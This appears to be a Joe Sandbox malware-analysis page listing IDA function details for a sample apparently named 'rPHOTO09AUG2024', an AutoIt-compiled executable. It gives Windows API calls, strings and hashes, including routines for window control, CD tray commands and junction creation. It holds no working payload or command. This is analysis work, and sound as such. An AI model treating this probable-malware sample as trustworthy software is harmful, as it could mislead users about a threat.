Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: da5b6ec4d0e62f3ebcb1f91c3f40602fd2b108eace1d60066a569a61e31bd2af
Instruction ID: 6e10f54b4370a3b8ecc2505b27a0d55e9c3429b013b21d9e4550cdc560e6a96f
Opcode Fuzzy Hash: da5b6ec4d0e62f3ebcb1f91c3f40602fd2b108eace1d60066a569a61e31bd2af
Instruction Fuzzy Hash: 3DB14A71A0020AAFDB14DFA8DC45BEE7BB5FB48314F148229FA15E6290DB74E951CB70

Function 00DC4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00DC40F6
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00DC41B6

Strings

VIEWCHANGE, xrefs: 00DC4375
ISSELECTED, xrefs: 00DC41C1
SELECTINVERT, xrefs: 00DC4286
GETSELECTED, xrefs: 00DC42E4
GETSUBITEMCOUNT, xrefs: 00DC4141
SELECTCLEAR, xrefs: 00DC4235
GETTEXT, xrefs: 00DC415F
GETITEMCOUNT, xrefs: 00DC4128
GETSELECTEDCOUNT, xrefs: 00DC4199
SELECT, xrefs: 00DC4250
FINDITEM, xrefs: 00DC4329
DESELECT, xrefs: 00DC42A4
SELECTALL, xrefs: 00DC421D

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
API String ID: 3974292440-719923060
Opcode ID: 3186bb420ec9c2fb244345c759823403d6766d45234584a876d927a5a766e53d
Instruction ID: fb15b36924234c29952af23080b09bf09859ea00d8bacd3509f00391cbbd4f13
Opcode Fuzzy Hash: 3186bb420ec9c2fb244345c759823403d6766d45234584a876d927a5a766e53d
Instruction Fuzzy Hash: 22A18C302543069BCB14EF20C9A2F6AB7A5EF84314F14896DB9969B7D2DB30EC05CB71

Function 00DB52F0 Relevance: 27.1, APIs: 18, Instructions: 124COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F89), ref: 00DB5309
LoadCursorW.USER32(00000000,00007F8A), ref: 00DB5314
LoadCursorW.USER32(00000000,00007F00), ref: 00DB531F
LoadCursorW.USER32(00000000,00007F03), ref: 00DB532A
LoadCursorW.USER32(00000000,00007F8B), ref: 00DB5335
LoadCursorW.USER32(00000000,00007F01), ref: 00DB5340
LoadCursorW.USER32(00000000,00007F81), ref: 00DB534B
LoadCursorW.USER32(00000000,00007F88), ref: 00DB5356
LoadCursorW.USER32(00000000,00007F80), ref: 00DB5361
LoadCursorW.USER32(00000000,00007F86), ref: 00DB536C
LoadCursorW.USER32(00000000,00007F83), ref: 00DB5377
LoadCursorW.USER32(00000000,00007F85), ref: 00DB5382
LoadCursorW.USER32(00000000,00007F82), ref: 00DB538D
LoadCursorW.USER32(00000000,00007F84), ref: 00DB5398
LoadCursorW.USER32(00000000,00007F04), ref: 00DB53A3
LoadCursorW.USER32(00000000,00007F02), ref: 00DB53AE
GetCursorInfo.USER32(?), ref: 00DB53BE
GetLastError.KERNEL32(00000001,00000000), ref: 00DB53E9

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Cursor$Load$ErrorInfoLast
String ID:
API String ID: 3215588206-0
Opcode ID: d84fe9a0b47871165d75174af265d3e27a8ccbca88b607599871856affeb0121
Instruction ID: c8e28d6a6bb2ae01eaf8dc0793f78e3f5efeb1219ce7fa558e22de33f676190c
Opcode Fuzzy Hash: d84fe9a0b47871165d75174af265d3e27a8ccbca88b607599871856affeb0121
Instruction Fuzzy Hash: 9C415370E04319AADB109FBA9C49DAFFFF8EF51B50B10452FE509E7290DAB894018E61

Function 00D9AA64 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00D9AAA5
__swprintf.LIBCMT ref: 00D9AB46
_wcscmp.LIBCMT ref: 00D9AB59
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00D9ABAE
_wcscmp.LIBCMT ref: 00D9ABEA
GetClassNameW.USER32(?,?,00000400), ref: 00D9AC21
GetDlgCtrlID.USER32(?), ref: 00D9AC73
GetWindowRect.USER32(?,?), ref: 00D9ACA9
GetParent.USER32(?), ref: 00D9ACC7
ScreenToClient.USER32(00000000), ref: 00D9ACCE
GetClassNameW.USER32(?,?,00000100), ref: 00D9AD48
_wcscmp.LIBCMT ref: 00D9AD5C
GetWindowTextW.USER32(?,?,00000400), ref: 00D9AD82
_wcscmp.LIBCMT ref: 00D9AD96

Part of subcall function 00D6386C: _iswctype.LIBCMT ref: 00D63874

Strings

%s%u, xrefs: 00D9AB40

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: dc03d6c2724fa4cc7628815071bacc6b4ff0b7b4b7709d761f9b5caa92f34c5a
Instruction ID: e2b3fac5c02b27644eb1d716dd6d80158887cd9c08eb19f8e456327a18798df3
Opcode Fuzzy Hash: dc03d6c2724fa4cc7628815071bacc6b4ff0b7b4b7709d761f9b5caa92f34c5a
Instruction Fuzzy Hash: 56A1AE72204706ABDB14DF28C884FEAB7A8FF04315F144629F999D6591EB30E945CBF2

Function 00D9B397 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 00D9B3DB
_wcscmp.LIBCMT ref: 00D9B3EC
GetWindowTextW.USER32(00000001,?,00000400), ref: 00D9B414
CharUpperBuffW.USER32(?,00000000), ref: 00D9B431
_wcscmp.LIBCMT ref: 00D9B44F
_wcsstr.LIBCMT ref: 00D9B460
GetClassNameW.USER32(00000018,?,00000400), ref: 00D9B498
_wcscmp.LIBCMT ref: 00D9B4A8
GetWindowTextW.USER32(00000002,?,00000400), ref: 00D9B4CF
GetClassNameW.USER32(00000018,?,00000400), ref: 00D9B518
_wcscmp.LIBCMT ref: 00D9B528
GetClassNameW.USER32(00000010,?,00000400), ref: 00D9B550
GetWindowRect.USER32(00000004,?), ref: 00D9B5B9

Strings

ThumbnailClass, xrefs: 00D9B4A3, 00D9B523
@, xrefs: 00D9B3BC

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 2b3187c99dfac441a969e28e51d9194f4f367444d83db556c0085f80163ff4f9
Instruction ID: 6f23d611dfda3a0c7b9fe624525affafc955c0a8574cefb56517a2e533edef4e
Opcode Fuzzy Hash: 2b3187c99dfac441a969e28e51d9194f4f367444d83db556c0085f80163ff4f9
Instruction Fuzzy Hash: 74819E710043069BDF04DF10EA85FAA7BE8EF44328F09856AFD859A092DB30ED49CB71

Function 00DCC8EE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D42612: GetWindowLongW.USER32(?,000000EB), ref: 00D42623

DragQueryPoint.SHELL32(?,?), ref: 00DCC917

Part of subcall function 00DCADF1: ClientToScreen.USER32(?,?), ref: 00DCAE1A
Part of subcall function 00DCADF1: GetWindowRect.USER32(?,?), ref: 00DCAE90
Part of subcall function 00DCADF1: PtInRect.USER32(?,?,00DCC304), ref: 00DCAEA0

SendMessageW.USER32(?,000000B0,?,?), ref: 00DCC980
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00DCC98B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00DCC9AE
_wcscat.LIBCMT ref: 00DCC9DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00DCC9F5
SendMessageW.USER32(?,000000B0,?,?), ref: 00DCCA0E
SendMessageW.USER32(?,000000B1,?,?), ref: 00DCCA25
SendMessageW.USER32(?,000000B1,?,?), ref: 00DCCA47
DragFinish.SHELL32(?), ref: 00DCCA4E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00DCCB41

Strings

pr, xrefs: 00DCCA8B
@GUI_DROPID, xrefs: 00DCCA6E
@GUI_DRAGFILE, xrefs: 00DCCAF0
@GUI_DRAGID, xrefs: 00DCCAB9

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr
API String ID: 169749273-2073472848
Opcode ID: 633483e812d8af00f64267866d2fdced3b11359dbc2a87929d26bd6679f63262
Instruction ID: 7d2f7db8af8fc5ec0c2eeab4977cd16155775d3805a1a11ba49b2497f5b12519
Opcode Fuzzy Hash: 633483e812d8af00f64267866d2fdced3b11359dbc2a87929d26bd6679f63262
Instruction Fuzzy Hash: 15615B71108302AFC701DF64DC85E9BBBE9EF88750F040A1EF695972A1DB709A49CB72

Function 00D9B1E0 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00D9B23F

Strings

REGEXP=, xrefs: 00D9B254
LAST, xrefs: 00D9B204
[ALL, xrefs: 00D9B2E5
[LAST, xrefs: 00D9B2EC
CLASSNAME=, xrefs: 00D9B27C
ALL, xrefs: 00D9B2D3
[CLASS:, xrefs: 00D9B28F
HANDLE=, xrefs: 00D9B238
[ACTIVE, xrefs: 00D9B22C
[REGEXPTITLE:, xrefs: 00D9B267
ACTIVE, xrefs: 00D9B21A
[HANDLE:, xrefs: 00D9B24B

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: abfd525b7cb28d6f5809acdb0cd5aa4b51296356582391e08ed8856fa95a65a1
Instruction ID: 25910c73cdd8cb3f83561acb9f65504f94a749893fe507d0427403256ce3a7fa
Opcode Fuzzy Hash: abfd525b7cb28d6f5809acdb0cd5aa4b51296356582391e08ed8856fa95a65a1
Instruction Fuzzy Hash: DD316B31A04309ABDF14FB60DE53EBEB7A4DF10760F654126B541B10D2EF61AE08CA75

Function 00D9C4C1 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00D9C4D4
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00D9C4E6
SetWindowTextW.USER32(?,?), ref: 00D9C4FD
GetDlgItem.USER32(?,000003EA), ref: 00D9C512
SetWindowTextW.USER32(00000000,?), ref: 00D9C518
GetDlgItem.USER32(?,000003E9), ref: 00D9C528
SetWindowTextW.USER32(00000000,?), ref: 00D9C52E
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00D9C54F
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00D9C569
GetWindowRect.USER32(?,?), ref: 00D9C572
SetWindowTextW.USER32(?,?), ref: 00D9C5DD
GetDesktopWindow.USER32 ref: 00D9C5E3
GetWindowRect.USER32(00000000), ref: 00D9C5EA
MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00D9C636
GetClientRect.USER32(?,?), ref: 00D9C643
PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00D9C668
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00D9C693

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: f660feb37117d00bb57c688d41cff01607fdcd8ad162805a70bd1c6b36a6f0af
Instruction ID: 3144673bdec534811ef1e7a967c5888435e56ea23dc5bf8f00d99ec27ae5d0f9
Opcode Fuzzy Hash: f660feb37117d00bb57c688d41cff01607fdcd8ad162805a70bd1c6b36a6f0af
Instruction Fuzzy Hash: E151217190070AAFDB20DFA8DD85FAEBBB5FF04705F004528E686A26A0D775B945CB60

Function 00DCA428 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00DCA4C8
DestroyWindow.USER32(?,?), ref: 00DCA542

Part of subcall function 00D47D2C: _memmove.LIBCMT ref: 00D47D66

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00DCA5BC
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00DCA5DE
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DCA5F1
DestroyWindow.USER32(00000000), ref: 00DCA613
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00D40000,00000000), ref: 00DCA64A
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00DCA663
GetDesktopWindow.USER32 ref: 00DCA67C
GetWindowRect.USER32(00000000), ref: 00DCA683
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00DCA69B
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00DCA6B3

Part of subcall function 00D425DB: GetWindowLongW.USER32(?,000000EB), ref: 00D425EC

Strings

0, xrefs: 00DCA4DE
tooltips_class32, xrefs: 00DCA5B5, 00DCA643

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: a2b3e2883e3460fe35786c4d079269a4145c787ef0892f15fbe84441b23ed17f
Instruction ID: 04ce0636aba4ea3f51038b3df4d1828416865579c1c12c75de146c5521f39252
Opcode Fuzzy Hash: a2b3e2883e3460fe35786c4d079269a4145c787ef0892f15fbe84441b23ed17f
Instruction Fuzzy Hash: 04719D7118070AAFD724CF28DC49FA677E6EB88308F08452DF985972A0D771E945DB36

Function 00DC4619 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00DC46AB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00DC46F6

Strings

EXISTS, xrefs: 00DC475F
COLLAPSE, xrefs: 00DC473C
GETITEMCOUNT, xrefs: 00DC47D8
EXPAND, xrefs: 00DC47A8
SELECT, xrefs: 00DC48A7
UNCHECK, xrefs: 00DC48D2
ISCHECKED, xrefs: 00DC4879
CHECK, xrefs: 00DC4716
GETTOTALCOUNT, xrefs: 00DC46DD
GETSELECTED, xrefs: 00DC4806
GETTEXT, xrefs: 00DC4849

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 9d0d56b78b081f76be7bca86e79ec058ae0efc223ed63f0557df6cdc50dc5c84
Instruction ID: 227f1eb181218d6e109f7ac8807349d571ddd058078fd6c5cc06324ac568c24b
Opcode Fuzzy Hash: 9d0d56b78b081f76be7bca86e79ec058ae0efc223ed63f0557df6cdc50dc5c84
Instruction Fuzzy Hash: 5C914C342047169FCB14EF24C461B6ABBA1EF94314F14885DF9965B7A2CB30ED4ACBB1

Function 00DCBAB8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00DCBB6E
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00DC9431), ref: 00DCBBCA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DCBC03
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00DCBC46
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00DCBC7D
FreeLibrary.KERNEL32(?), ref: 00DCBC89
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00DCBC99
DestroyIcon.USER32(?,?,?,?,?,00DC9431), ref: 00DCBCA8
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00DCBCC5
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00DCBCD1

Part of subcall function 00D6313D: __wcsicmp_l.LIBCMT ref: 00D631C6

Strings

.dll, xrefs: 00DCBB27
.icl, xrefs: 00DCBAE4
.exe, xrefs: 00DCBB04

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: a26b7077ad02af218bb26628fb611b833fdc47710ff85eaee9e240c75140bf80
Instruction ID: 1bfca76e2bf26569764852ce7d79d694abf19f9943917e60cf6de4b4fa55deed
Opcode Fuzzy Hash: a26b7077ad02af218bb26628fb611b833fdc47710ff85eaee9e240c75140bf80
Instruction Fuzzy Hash: A761CE71A0061ABAEB14DF74CD42FBA7BA8EB08720F10411AF915D71D0DB74EA94CBB0

Function 00DAA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00D49997: __itow.LIBCMT ref: 00D499C2
Part of subcall function 00D49997: __swprintf.LIBCMT ref: 00D49A0C

CharLowerBuffW.USER32(?,?), ref: 00DAA636
GetDriveTypeW.KERNEL32 ref: 00DAA683
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DAA6CB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DAA702
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DAA730

Part of subcall function 00D47D2C: _memmove.LIBCMT ref: 00D47D66

Strings

close cd wait, xrefs: 00DAA71B
set cd door , xrefs: 00DAA6D1
close, xrefs: 00DAA63C
type cdaudio alias cd wait, xrefs: 00DAA6AE
wait, xrefs: 00DAA6ED
open, xrefs: 00DAA65D
closed, xrefs: 00DAA64A, 00DAA653
open , xrefs: 00DAA692

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 347375a2543f59a607a2b1631ea84c0cfb34eb4813e57660604d601eaedc33bd
Instruction ID: 1f4455e5ae9bf1a5580ba75a4cf2732c7d91472e444f727832a4dc6f4254e345
Opcode Fuzzy Hash: 347375a2543f59a607a2b1631ea84c0cfb34eb4813e57660604d601eaedc33bd
Instruction Fuzzy Hash: 175137711047059FC700EF24C89196AB7F4EF98718F14896DF89A972A1DB31AE0ACB72

Function 00DAA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00DAA47A
__swprintf.LIBCMT ref: 00DAA49C
CreateDirectoryW.KERNEL32(?,00000000), ref: 00DAA4D9
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00DAA4FE
_memset.LIBCMT ref: 00DAA51D
_wcsncpy.LIBCMT ref: 00DAA559
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00DAA58E
CloseHandle.KERNEL32(00000000), ref: 00DAA599
RemoveDirectoryW.KERNEL32(?), ref: 00DAA5A2
CloseHandle.KERNEL32(00000000), ref: 00DAA5AC

Strings

:, xrefs: 00DAA4BD
\, xrefs: 00DAA4B2
\??\%s, xrefs: 00DAA496

Memory Dump Source

Source File: 00000000.00000002.2174055744.0000000000D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true

Associated: 00000000.00000002.2174036607.0000000000D40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DCF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174109080.0000000000DF5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174156354.0000000000DFF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174177264.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d40000_rPHOTO09AUG2024.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
